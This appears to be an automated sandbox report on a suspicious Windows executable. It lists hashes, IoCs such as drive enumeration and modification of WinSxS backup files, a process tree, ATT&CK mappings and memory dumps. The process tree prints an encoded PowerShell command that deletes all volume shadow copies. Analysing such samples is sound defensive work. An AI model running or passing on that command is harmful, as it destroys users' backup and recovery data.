7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678

General

Target

7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe
Size

171KB
MD5

999660513492abf77dcd46db5ae97f17
SHA1

2c75960079eb449183dc284ca64845f663ab5a61
SHA256

7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678
SHA512

d988bde1189122a268dbbad2b61459b1238884d79a22cf7a4e52dfb4cd3f87ca3e1e31d30b71a58a99d54446d5ae3f7d117f4eae4fbf715a761da61845666f46

Score

6^/10

Malware Config

Signatures

Enumerates connected drives 3 TTPs 24 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe

description	ioc	process
File opened (read-only)	\??\W:	7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe
File opened (read-only)	\??\A:	7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe
File opened (read-only)	\??\E:	7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe
File opened (read-only)	\??\M:	7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe
File opened (read-only)	\??\P:	7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe
File opened (read-only)	\??\S:	7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe
File opened (read-only)	\??\T:	7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe
File opened (read-only)	\??\U:	7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe
File opened (read-only)	\??\Z:	7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe
File opened (read-only)	\??\B:	7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe
File opened (read-only)	\??\H:	7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe
File opened (read-only)	\??\J:	7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe
File opened (read-only)	\??\L:	7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe
File opened (read-only)	\??\O:	7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe
File opened (read-only)	\??\Q:	7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe
File opened (read-only)	\??\V:	7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe
File opened (read-only)	\??\G:	7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe
File opened (read-only)	\??\N:	7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe
File opened (read-only)	\??\Y:	7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe
File opened (read-only)	\??\F:	7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe
File opened (read-only)	\??\I:	7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe
File opened (read-only)	\??\K:	7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe
File opened (read-only)	\??\R:	7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe
File opened (read-only)	\??\X:	7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe

Drops file in Windows directory 64 IoCs

Processes:

7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe

description	ioc	process
File opened for modification	C:\Windows\winsxs\Backup\x86_microsoft-windows-keyiso.resources_31bf3856ad364e35_6.1.7600.16385_ja-jp_39319f9b92aa47f0.manifest	7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe
File opened for modification	C:\Windows\winsxs\Backup\x86_microsoft-windows-s..edstorage.resources_31bf3856ad364e35_6.1.7600.16385_de-de_c9e31697c5d34471.manifest	7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe
File opened for modification	C:\Windows\winsxs\Backup\amd64_microsoft-windows-e..e-library.resources_31bf3856ad364e35_6.1.7600.16385_ja-jp_9d2ef62bea869408.manifest	7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe
File opened for modification	C:\Windows\winsxs\Backup\amd64_microsoft-windows-font-truetype-batang_31bf3856ad364e35_6.1.7600.16385_none_13de7dc07ffbe591_batang.ttc_949601ce	7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe
File opened for modification	C:\Windows\winsxs\Backup\amd64_microsoft-windows-s..subsystem.resources_31bf3856ad364e35_6.1.7600.16385_de-de_a6c9ede9493e8861_scarddlg.dll.mui_300ae9df	7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe
File opened for modification	C:\Windows\winsxs\Backup\wow64_microsoft-windows-smss_31bf3856ad364e35_6.1.7600.16385_none_128443f66743685c_apisetschema.dll_d4a833e3	7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe
File opened for modification	C:\Windows\winsxs\Backup\x86_hid-user.resources_31bf3856ad364e35_6.1.7600.16385_fr-fr_07fbb9023f7f0b75_hid.dll.mui_cccd5ae0	7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe
File opened for modification	C:\Windows\winsxs\Backup\x86_microsoft-windows-comdlg32.resources_31bf3856ad364e35_6.1.7601.17514_nb-no_a7ca3e47560bf419_comdlg32.dll.mui_ac8e62f4	7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe
File opened for modification	C:\Windows\winsxs\Backup\x86_microsoft-windows-s..resources.resources_31bf3856ad364e35_6.1.7600.16385_es-es_fb26d0070ea533e6.manifest	7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe
File opened for modification	C:\Windows\winsxs\Backup\x86_microsoft-windows-winbio.resources_31bf3856ad364e35_6.1.7600.16385_fr-fr_3e33ece83f8d9a01_winbio.dll.mui_7a8d17bd	7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe
File opened for modification	C:\Windows\winsxs\Backup\amd64_microsoft-windows-font-bitmap-system_31bf3856ad364e35_6.1.7600.16385_none_df4bbe8e10903104_svgasys.fon_32986711	7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe
File opened for modification	C:\Windows\winsxs\Backup\amd64_microsoft-windows-s..subsystem.resources_31bf3856ad364e35_6.1.7600.16385_es-es_4f8620c6384385cb_certprop.dll.mui_602eaab4	7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe
File opened for modification	C:\Windows\winsxs\Backup\amd64_microsoft-windows-wininit.resources_31bf3856ad364e35_6.1.7600.16385_de-de_f869ac74355a4089.manifest	7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe
File opened for modification	C:\Windows\winsxs\Backup\amd64_microsoft-windows-wininit.resources_31bf3856ad364e35_6.1.7600.16385_en-us_a15a826d24384c4e_wininit.exe.mui_997435f5	7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe
File opened for modification	C:\Windows\winsxs\Backup\x86_hid-user.resources_31bf3856ad364e35_6.1.7600.16385_de-de_bc8810265da7f7a9_hid.dll.mui_cccd5ae0	7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe
File opened for modification	C:\Windows\winsxs\Backup\amd64_microsoft-windows-font-truetype-tunga_31bf3856ad364e35_6.1.7600.16385_none_e4baa884cb08804d.manifest	7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe
File opened for modification	C:\Windows\winsxs\Backup\x86_microsoft-windows-b..ager-pcat.resources_31bf3856ad364e35_6.1.7600.16385_sv-se_04742208cf729608_bootmgr.exe.mui_c434701f	7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe
File opened for modification	C:\Windows\winsxs\Backup\x86_microsoft-windows-i..er-engine.resources_31bf3856ad364e35_6.1.7601.17514_lt-lt_bf2eaae65ee1141a.manifest	7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe
File opened for modification	C:\Windows\winsxs\Backup\x86_microsoft-windows-sendmail.resources_31bf3856ad364e35_6.1.7600.16385_ja-jp_1e196194a0e8e07b_sendmail.dll.mui_cbac108c	7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe
File opened for modification	C:\Windows\winsxs\Backup\amd64_microsoft-windows-a..llservice.resources_31bf3856ad364e35_6.1.7600.16385_fr-fr_5c45d6abafdb56d6_axinstui.exe.mui_aea34130	7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe
File opened for modification	C:\Windows\winsxs\Backup\amd64_microsoft-windows-userenv.resources_31bf3856ad364e35_6.1.7600.16385_fr-fr_c26a086b301c0205_userenv.dll.mui_e516a7e7	7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe
File opened for modification	C:\Windows\winsxs\Backup\amd64_microsoft-windows-wmi-core.resources_31bf3856ad364e35_6.1.7600.16385_de-de_87cba9e8f27bba0e_wmiapsrv.exe.mui_b1567840	7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe
File opened for modification	C:\Windows\winsxs\Backup\x86_microsoft-windows-b..ager-pcat.resources_31bf3856ad364e35_6.1.7600.16385_zh-tw_82dac7a36bd74688.manifest	7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe
File opened for modification	C:\Windows\winsxs\Backup\x86_microsoft-windows-mlang.resources_31bf3856ad364e35_6.1.7600.16385_fi-fi_24ff5a886963291e.manifest	7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe
File opened for modification	C:\Windows\winsxs\Backup\x86_microsoft-windows-userenv.resources_31bf3856ad364e35_6.1.7600.16385_fr-fr_664b6ce777be90cf_userenv.dll.mui_e516a7e7	7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe
File opened for modification	C:\Windows\winsxs\Backup\amd64_microsoft-windows-rasbase.resources_31bf3856ad364e35_6.1.7600.16385_de-de_111bacf3e074578c_rasdiag.dll.mui_15cb4ec4	7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe
File opened for modification	C:\Windows\winsxs\Backup\amd64_microsoft-windows-u..em-config.resources_31bf3856ad364e35_6.1.7600.16385_es-es_ed817b78e47d1926_mdminst.dll.mui_19a87063	7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe
File opened for modification	C:\Windows\winsxs\Backup\wow64_microsoft-windows-ole-automation_31bf3856ad364e35_6.1.7601.17514_none_257ada4f467a7f64.manifest	7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe
File opened for modification	C:\Windows\winsxs\Backup\x86_microsoft-windows-d..irectdraw.resources_31bf3856ad364e35_6.1.7600.16385_ja-jp_9d5be3a38b80bebf.manifest	7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe
File opened for modification	C:\Windows\winsxs\Backup\x86_microsoft-windows-d..lient-dll.resources_31bf3856ad364e35_6.1.7600.16385_es-es_5588b35e1b8aed89_dhcpcsvc.dll.mui_186571e1	7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe
File opened for modification	C:\Windows\winsxs\Backup\x86_microsoft-windows-shlwapi.resources_31bf3856ad364e35_6.1.7600.16385_ja-jp_827616fb42a2a1fe.manifest	7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe
File opened for modification	C:\Windows\winsxs\Backup\amd64_microsoft-windows-font-bitmap-system_31bf3856ad364e35_6.1.7600.16385_none_df4bbe8e10903104_vgas1256.fon_a23e6fc8	7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe
File opened for modification	C:\Windows\winsxs\Backup\amd64_microsoft-windows-font-bitmap-terminal_31bf3856ad364e35_6.1.7600.16385_none_70644a8bdb0d9303_cga80857.fon_2e82e0e8	7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe
File opened for modification	C:\Windows\winsxs\Backup\amd64_microsoft-windows-rasbase-raspptp_31bf3856ad364e35_6.1.7601.17514_none_f8152447fe76675d_raspptp.sys_25e89db1	7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe
File opened for modification	C:\Windows\winsxs\Backup\amd64_microsoft-windows-w..r-webclnt.resources_31bf3856ad364e35_6.1.7600.16385_fr-fr_3de2b918dd486536_webclnt.dll.mui_e8f04040	7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe
File opened for modification	C:\Windows\winsxs\Backup\amd64_microsoft-windows-wbiosrvc.resources_31bf3856ad364e35_6.1.7600.16385_fr-fr_ea0765d13cc3f170_wbiosrvc.dll.mui_d5b8b2b8	7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe
File opened for modification	C:\Windows\winsxs\Backup\amd64_microsoft-windows-font-bitmap-terminal_31bf3856ad364e35_6.1.7600.16385_none_70644a8bdb0d9303_app936.fon_ea7f5612	7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe
File opened for modification	C:\Windows\winsxs\Backup\amd64_microsoft-windows-font-truetype-raavi_31bf3856ad364e35_6.1.7600.16385_none_a2d43ed8e3097243.manifest	7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe
File opened for modification	C:\Windows\winsxs\Backup\amd64_microsoft-windows-mssign32-dll.resources_31bf3856ad364e35_6.1.7600.16385_fr-fr_bc6f0b29008b14a0_mssign32.dll.mui_d663578f	7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe
File opened for modification	C:\Windows\winsxs\Backup\amd64_microsoft-windows-sens-service.resources_31bf3856ad364e35_6.1.7600.16385_fr-fr_13b9a88a2eaf457e_sens.dll.mui_64739194	7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe
File opened for modification	C:\Windows\winsxs\Backup\amd64_microsoft-windows-u..assdriver.resources_31bf3856ad364e35_6.1.7600.16385_de-de_3cfaadc1b77ac85e_modem.sys.mui_10a823ac	7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe
File opened for modification	C:\Windows\winsxs\Backup\amd64_microsoft-windows-wininit_31bf3856ad364e35_6.1.7600.16385_none_8ce7aa761e01ad49.manifest	7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe
File opened for modification	C:\Windows\winsxs\Backup\wow64_microsoft-windows-msxml60.resources_31bf3856ad364e35_6.1.7600.16385_en-us_3bdcee47d56ca31c_msxml6r.dll.mui_4516d602	7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe
File opened for modification	C:\Windows\winsxs\Backup\wow64_microsoft-windows-rasbase_31bf3856ad364e35_6.1.7601.17514_none_765b17a2c56f9155_rascfg.dll_3bcc53bc	7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe
File opened for modification	C:\Windows\winsxs\Backup\x86_microsoft-windows-newdev_31bf3856ad364e35_6.1.7600.16385_none_114ca177b1fcad24_newdev.mof_7eb757c7	7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe
File opened for modification	C:\Windows\winsxs\Backup\x86_microsoft-windows-s..edstorage.resources_31bf3856ad364e35_6.1.7600.16385_es-es_729f4974b4d841db.manifest	7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe
File opened for modification	C:\Windows\winsxs\Backup\amd64_microsoft-windows-d..owmanager.resources_31bf3856ad364e35_6.1.7600.16385_ja-jp_34be759892c77101_dwm.exe.mui_706e052f	7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe
File opened for modification	C:\Windows\winsxs\Backup\amd64_microsoft-windows-rasserver.resources_31bf3856ad364e35_6.1.7601.17514_ja-jp_083761eb9020e571.manifest	7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe
File opened for modification	C:\Windows\winsxs\Backup\amd64_microsoft-windows-s..temclient.resources_31bf3856ad364e35_6.1.7600.16385_fr-fr_d0b642a01042b922.manifest	7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe
File opened for modification	C:\Windows\winsxs\Backup\amd64_microsoft-windows-userenv.resources_31bf3856ad364e35_6.1.7600.16385_de-de_76f65f8f4e44ee39_userenv.dll.mui_e516a7e7	7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe
File opened for modification	C:\Windows\winsxs\Backup\amd64_microsoft-windows-comdlg32.resources_31bf3856ad364e35_6.1.7601.17514_fr-fr_eb9f068d79867b24.manifest	7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe
File opened for modification	C:\Windows\winsxs\Backup\amd64_microsoft-windows-d..lient-dll.resources_31bf3856ad364e35_6.1.7600.16385_de-de_08eb1c04e4e36155.manifest	7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe
File opened for modification	C:\Windows\winsxs\Backup\amd64_microsoft-windows-tabletpc-softkeyboard_31bf3856ad364e35_6.1.7601.17514_none_2fd7b56967fc5c76_oskpredbase.xml_c06c76de	7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe
File opened for modification	C:\Windows\winsxs\Backup\amd64_microsoft-windows-x..nrollment.resources_31bf3856ad364e35_6.1.7600.16385_fr-fr_4bfe66dcce55e7e4_certenrollctrl.exe.mui_3b48c5a6	7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe
File opened for modification	C:\Windows\winsxs\Backup\x86_microsoft-windows-g..licy-base.resources_31bf3856ad364e35_6.1.7600.16385_de-de_181a1bc5e35bb95e_gpapi.dll.mui_ef0a9748	7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe
File opened for modification	C:\Windows\winsxs\Backup\x86_hid-user.resources_31bf3856ad364e35_6.1.7600.16385_fr-fr_07fbb9023f7f0b75.manifest	7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe
File opened for modification	C:\Windows\winsxs\Backup\x86_microsoft-windows-mlang.resources_31bf3856ad364e35_6.1.7600.16385_bg-bg_97b937009fa00cc6_mlang.dll.mui_2904864a	7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe
File opened for modification	C:\Windows\winsxs\Backup\amd64_microsoft-windows-f..ruetype-iskoolapota_31bf3856ad364e35_6.1.7600.16385_none_2a668cf479ef0388_iskpotab.ttf_f096fc81	7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe
File opened for modification	C:\Windows\winsxs\Backup\amd64_microsoft-windows-i..rvice_mof.resources_31bf3856ad364e35_6.1.7600.16385_fr-fr_23a966a2fe2f7ffb.manifest	7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe
File opened for modification	C:\Windows\winsxs\Backup\amd64_microsoft-windows-imageres.resources_31bf3856ad364e35_6.1.7600.16385_en-us_7a6c8b69bbb7da85.manifest	7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe
File opened for modification	C:\Windows\winsxs\Backup\amd64_microsoft-windows-imagesp1.resources_31bf3856ad364e35_6.1.7600.16385_en-us_ffa6d6a78501d8eb_imagesp1.dll.mui_14e4c892	7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe
File opened for modification	C:\Windows\winsxs\Backup\amd64_microsoft-windows-sens-service.resources_31bf3856ad364e35_6.1.7600.16385_en-us_7136d5a73bb63d77.manifest	7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe
File opened for modification	C:\Windows\winsxs\Backup\amd64_microsoft-windows-tcpip.resources_31bf3856ad364e35_6.1.7600.16385_es-es_2802c7e3e6fbf6e9_tcpipcfg.dll.mui_a5479fc1	7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe
File opened for modification	C:\Windows\winsxs\Backup\x86_microsoft-windows-uxtheme.resources_31bf3856ad364e35_6.1.7600.16385_de-de_6d057f90b91b6b1f.manifest	7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exepowershell.exe

pid process

1212 7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe
524 powershell.exe

pid	process
1212	7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe
524	powershell.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

Processes:

powershell.exevssvc.exe

description	pid	process
Token: SeDebugPrivilege	524	powershell.exe
Token: SeBackupPrivilege	836	vssvc.exe
Token: SeRestorePrivilege	836	vssvc.exe
Token: SeAuditPrivilege	836	vssvc.exe

Suspicious use of WriteProcessMemory 4 IoCs

Processes:

7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe

description	pid	process	target process
PID 1212 wrote to memory of 524	1212	7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe	powershell.exe
PID 1212 wrote to memory of 524	1212	7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe	powershell.exe
PID 1212 wrote to memory of 524	1212	7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe	powershell.exe
PID 1212 wrote to memory of 524	1212	7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe	powershell.exe

C:\Users\Admin\AppData\Local\Temp\7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe
"C:\Users\Admin\AppData\Local\Temp\7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe"
1⤵
- Enumerates connected drives
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1212

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:524

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:1380

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:836

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

Peripheral Device Discovery

1

T1120

System Information Discovery

1

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/524-55-0x000007FEFBE91000-0x000007FEFBE93000-memory.dmp

Filesize
8KB

Download
memory/524-57-0x0000000002840000-0x0000000002842000-memory.dmp

Filesize
8KB

Download
memory/524-58-0x0000000002842000-0x0000000002844000-memory.dmp

Filesize
8KB

Download
memory/524-59-0x0000000002844000-0x0000000002847000-memory.dmp

Filesize
12KB

Download
memory/524-56-0x000007FEF3460000-0x000007FEF3FBD000-memory.dmp

Filesize
11.4MB

Download
memory/524-60-0x000000001B830000-0x000000001BB2F000-memory.dmp

Filesize
3.0MB

Download
memory/524-61-0x000000000284B000-0x000000000286A000-memory.dmp

Filesize
124KB

Download
memory/1212-54-0x0000000075891000-0x0000000075893000-memory.dmp

Filesize
8KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads